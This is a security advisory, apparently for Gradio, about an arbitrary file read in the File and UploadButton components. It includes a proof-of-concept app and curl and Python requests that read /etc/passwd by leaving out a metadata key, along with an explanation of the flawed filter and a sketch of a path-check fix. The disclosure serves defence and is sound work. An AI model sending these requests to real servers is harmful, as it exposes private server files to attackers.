Arbitrary file read with File and UploadButton components

Summary

If the File or UploadButton components are used as part of a Gradio application to preview file content, an attacker with access to the application can abuse these components to read arbitrary files from the application server.

Details

Consider the following application where a user can upload a file and preview its content:

import gradio as gr

def greet(value: bytes):
    # Echo the raw bytes of the uploaded file back to the user
    return str(value)

demo = gr.Interface(fn=greet, inputs=gr.File(type="binary"), outputs="textbox")

if __name__ == "__main__":
    demo.launch()

If we run this application and send the following request, which attempts to read the /etc/passwd file:

curl 'http://127.0.0.1:7860/gradio_api/run/predict' -H 'content-type: application/json' --data-raw '{"data":[{"path":"/etc/passwd","orig_name":"test.txt","size":4,"mime_type":"text/plain","meta":{"_type":"gradio.FileData"}}],"event_data":null,"fn_index":0,"trigger_id":8,"session_hash":"mnv42s5gt7"}'

the server raises the following error:

gradio.exceptions.InvalidPathError: Cannot move /etc/passwd to the gradio cache dir because it was not uploaded by a user.

This is expected. However, if we now remove the "meta":{"_type":"gradio.FileData"} entry from the request:

curl 'http://127.0.0.1:7860/gradio_api/run/predict' -H 'content-type: application/json' --data-raw '{"data":[{"path":"/etc/passwd","orig_name":"test.txt","size":4,"mime_type":"text/plain"}],"event_data":null,"fn_index":0,"trigger_id":8,"session_hash":"mnv42s5gt7"}'

the request does not raise an error, and the response contains the content of /etc/passwd.

This works because Gradio relies on processing_utils.async_move_files_to_cache to sanitize the file paths in all inputs. This function performs the following operation:

    return await client_utils.async_traverse(
        data, _move_to_cache, client_utils.is_file_obj_with_meta
    )

where client_utils.is_file_obj_with_meta acts as a filter that selects the inputs to which _move_to_cache is applied (_move_to_cache is also the function that performs the allowed/disallowed check on the file path). The problem is that client_utils.is_file_obj_with_meta is not guaranteed to match every input that contains a file path:

def is_file_obj_with_meta(d) -> bool:
    """
    Check if the given value is a valid FileData object dictionary in newer versions of Gradio
    where the file objects include a specific "meta" key, e.g.
    {
        "path": "path/to/file",
        "meta": {"_type: "gradio.FileData"}
    }
    """
    return (
        isinstance(d, dict)
        and "path" in d
        and isinstance(d["path"], str)
        and "meta" in d
        and d["meta"].get("_type", "") == "gradio.FileData"
    )

For example, as in the PoC, the file path is not checked if the meta key is absent from the request or if _type is not gradio.FileData.
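
To make the gap concrete, the following sketch copies the predicate quoted above and applies it to the two file objects used in this advisory. The traverse helper is a simplified, synchronous stand-in for client_utils.async_traverse written only for illustration; it is an assumption about the general shape of that function, not Gradio's actual code, and mark_checked is a hypothetical placeholder for _move_to_cache.

```python
def is_file_obj_with_meta(d) -> bool:
    # Same logic as the predicate quoted in this advisory.
    return (
        isinstance(d, dict)
        and "path" in d
        and isinstance(d["path"], str)
        and "meta" in d
        and d["meta"].get("_type", "") == "gradio.FileData"
    )


def traverse(data, func, is_root):
    # Simplified stand-in (assumption): apply func only where is_root matches,
    # otherwise recurse into containers and leave other values untouched.
    if is_root(data):
        return func(data)
    if isinstance(data, dict):
        return {k: traverse(v, func, is_root) for k, v in data.items()}
    if isinstance(data, list):
        return [traverse(v, func, is_root) for v in data]
    return data


def mark_checked(d):
    # Hypothetical placeholder for _move_to_cache: record that the check ran.
    return {**d, "checked": True}


with_meta = {"path": "/etc/passwd", "meta": {"_type": "gradio.FileData"}}
without_meta = {"path": "/etc/passwd"}

checked = traverse([with_meta], mark_checked, is_file_obj_with_meta)
skipped = traverse([without_meta], mark_checked, is_file_obj_with_meta)

print("with meta, check ran:", "checked" in checked[0])
print("without meta, check ran:", "checked" in skipped[0])
```

In this sketch the object without the meta key passes through the traversal unchanged, so its path is never handed to the checking function.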

The path therefore remains under the attacker's control and is used to read a file in the _process_single_file function in file.py and upload_button.py (and possibly in other places).
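
One way to reason about the missing check is to validate the path at the point where the file is read, regardless of how the input was labelled. The sketch below is purely illustrative and is not the fix that Gradio shipped; is_within_directory and read_uploaded_file are hypothetical helpers, and the upload directory is an assumed parameter.

```python
import tempfile
from pathlib import Path


def is_within_directory(path: str, allowed_dir: str) -> bool:
    # Resolve symlinks and ".." segments before comparing the two paths.
    resolved = Path(path).resolve()
    base = Path(allowed_dir).resolve()
    try:
        resolved.relative_to(base)
    except ValueError:
        return False
    return True


def read_uploaded_file(path: str, upload_dir: str) -> bytes:
    # Hypothetical read helper: refuse any path outside the upload directory.
    if not is_within_directory(path, upload_dir):
        raise PermissionError(f"{path} is outside the upload directory")
    return Path(path).read_bytes()


# Usage with a temporary directory standing in for the upload cache.
with tempfile.TemporaryDirectory() as upload_dir:
    uploaded = Path(upload_dir) / "test.txt"
    uploaded.write_bytes(b"test")
    inside_ok = read_uploaded_file(str(uploaded), upload_dir)
    outside_allowed = is_within_directory("/etc/passwd", upload_dir)
    traversal_allowed = is_within_directory(
        str(Path(upload_dir) / ".." / "other.txt"), upload_dir
    )
```

With a check of this kind, a request that names /etc/passwd would be rejected even when the meta key is absent, because the decision depends on the resolved path rather than on the shape of the input.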

PoC

As described above, run the following Gradio app:

import gradio as gr

def greet(value: bytes):
    # Echo the raw bytes of the uploaded file back to the user
    return str(value)

demo = gr.Interface(fn=greet, inputs=gr.File(type="binary"), outputs="textbox")

if __name__ == "__main__":
    demo.launch()

Then send the following request:

curl 'http://127.0.0.1:7860/gradio_api/run/predict' -H 'content-type: application/json' --data-raw '{"data":[{"path":"/etc/passwd","orig_name":"test.txt","size":4,"mime_type":"text/plain"}],"event_data":null,"fn_index":0,"trigger_id":8,"session_hash":"mnv42s5gt7"}'
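
For readers who prefer to script the request, the following is a minimal Python sketch of the same payload using only the standard library. The build_payload and build_request helpers are hypothetical names introduced here; the URL, field names, and values are taken from the curl command above. The request is only constructed, not sent.

```python
import json
import urllib.request


def build_payload(path: str, include_meta: bool) -> dict:
    # Mirror the JSON body of the curl requests in this advisory.
    file_obj = {
        "path": path,
        "orig_name": "test.txt",
        "size": 4,
        "mime_type": "text/plain",
    }
    if include_meta:
        file_obj["meta"] = {"_type": "gradio.FileData"}
    return {
        "data": [file_obj],
        "event_data": None,
        "fn_index": 0,
        "trigger_id": 8,
        "session_hash": "mnv42s5gt7",
    }


def build_request(base_url: str, payload: dict) -> urllib.request.Request:
    # Prepare a POST request; nothing is sent until urlopen is called.
    return urllib.request.Request(
        f"{base_url}/gradio_api/run/predict",
        data=json.dumps(payload).encode("utf-8"),
        headers={"content-type": "application/json"},
        method="POST",
    )


payload = build_payload("/etc/passwd", include_meta=False)
request = build_request("http://127.0.0.1:7860", payload)

# To send it against a local test instance:
# with urllib.request.urlopen(request) as response:
#     print(response.read().decode())
```

Passing include_meta=True reproduces the first request from the Details section, which the server is expected to reject with InvalidPathError.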

Impact

Arbitrary file read in specific Gradio applications that use File or UploadButton components to upload files and echo/preview the content to the user.
